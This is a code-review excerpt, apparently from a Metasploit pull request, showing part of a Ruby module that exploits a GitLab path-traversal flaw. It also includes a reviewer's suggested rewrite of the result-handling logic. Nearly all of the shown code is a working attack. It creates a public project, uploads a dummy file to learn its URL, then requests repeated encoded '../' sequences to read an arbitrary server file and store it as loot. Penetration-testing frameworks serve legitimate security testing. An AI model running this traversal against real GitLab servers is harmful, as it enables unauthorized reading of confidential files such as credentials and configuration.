modules/auxiliary/scanner/http/gitlab_subgroups_file_read.rb

```diff
@@ -0,0 +1,229 @@
+        'project[namespace_id]' => parent_id,
+        'project[path]' => project_name,
+        'project[visibility_level]' => 20,
+        'project[initialize_with_readme]' => 1, # The POC is missing a ] here, fingerprintable?
+        'authenticity_token' => csrf_token
+      }
+    })
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected Respones Code (response code: #{res.code})") unless res.code == 302
+    csrf_token = get_csrf(res.body)
+
+    project_id = res.headers['Location'].to_s.split('/')[3..].join('/') # strip off http[s]://ip/, seems like there should be a better way to do this though
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, project_id)
+    })
+    csrf_token = get_csrf(res.body)
+
+    # upload a dummy file
+    print_status('Creating a dummy file in project')
+    file_name = Rex::Text.rand_text_alphanumeric(8, 10)
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, project_id, 'uploads'),
+      'method' => 'POST',
+      'headers' => {
+        'X-CSRF-Token' => csrf_token,
+        'Accept' => '*/*' # required or you get a 404
+      },
+      'vars_form_data' => [
+        {
+          'name' => 'file',
+          'filename' => file_name,
+          'data' => Rex::Text.rand_text_alphanumeric(4, 25)
+        }
+      ]
+    })
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected Respones Code (response code: #{res.code})") unless res.code == 200
+    res = res.get_json_document
+    file_url = res['link']['url']
+    # remove our file name
+    file_url = file_url.gsub("/#{file_name}", '')
+
+    # finally, read our file
+    print_status('Executing dir traversal')
+    target_file = datastore['FILE']
+    target_file = target_file.gsub('/', '%2F')
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, project_id, file_url, '..%2F' * datastore['DEPTH'] + "..#{target_file}"),
+      'headers' => {
+        'Accept' => '*/*' # required or you get a 404
+      }
+    })
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    if res.code == 500
+      print_error("Unable to read file (permissions, or file doens't exist)")
+    elsif res.code != 200
+      print_error("#{peer} - Unexpected Respones Code (response code: #{res.code})") # don't fail_with so we can cleanup
+    end
+
+    if !res.body.empty? && res.code == 200
+      print_good(res.body)
+      loot_path = store_loot('Gitlab file', 'text/plain', ip, res.body, datastore['FILE'])
+      print_good("#{datastore['FILE']} saved to #{loot_path}")
+    elsif res.body.empty?
+      print_error('Response has 0 size.')
+    else
+      print_error('Bad response, initiating cleanup')
+    end
```

Comment:
```suggestion
    if res.body.empty?
      print_error('Response has 0 size.')
    elsif res.code == 200
      print_good(res.body)
      loot_path = store_loot('Gitlab file', 'text/plain', ip, res.body, datastore['FILE'])
      print_good("#{datastore['FILE']} saved to #{loot_path}")
    else
      print_error('Bad response, initiating cleanup')
    end
```

Suggested simplification of logic here.